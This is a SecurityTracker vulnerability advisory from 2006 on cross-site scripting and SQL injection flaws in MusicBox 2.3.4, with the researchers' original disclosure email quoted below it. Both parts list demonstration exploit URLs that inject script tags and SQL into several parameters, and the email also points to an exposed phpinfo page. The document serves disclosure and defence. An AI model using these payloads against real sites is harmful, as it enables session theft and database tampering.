MusicBox Input Validation Holes Permit Cross-Site Scripting and SQL Injection Attacks
|
|
SecurityTracker Alert ID: 1016567
|
|
SecurityTracker URL: http://securitytracker.com/id?1016567
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 25 2006
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 2.3.4
|
Description: A vulnerability was reported in MusicBox. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.
Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create
a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's
browser. The code will originate from the site running the MusicBox software and will run in the security context of that site.
As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with
the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the
target user.
Some demonstration exploit URLs are provided:
http://[target]/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://[target]/index.php?i
d=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://[target]/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0
http://[target]/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>
http://[target]/index.php?action=top&show=<script>alert(/EllipsisSecur
ityTest/)</script>&type=Artists
A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying
database.
Some demonstration exploit URLs are provided:
http://[target]/index.php?term=hit&in=song&action=search&start=`[SQL]
http://[target]/index.php?action=to
p&show=1'[SQL]&type=Artists
http://[target]/?action=viewgallery&type=album&aid=&page=-1[SQL]
Ellipsis Security reported this
vulnerability.
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
MusicBox software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
A remote user can execute SQL commands on the underlying database.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.musicboxv2.com/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: securityconnection@gmail.com
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 24 Jul 2006 16:00:16 +0000
From: securityconnection@gmail.com
Subject: MusicBox <= 2.3.4 XSS SQL injection Vulnerability
|
MusicBox 2.3.4
http://www.musicboxv2.com
------------
PHPinfo page
------------
/phpinfo.php
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>& page=0
http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in =song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTe st/)</script>
http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</sc ript>&type=Artists
-------------
SQL injection
-------------
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
|
|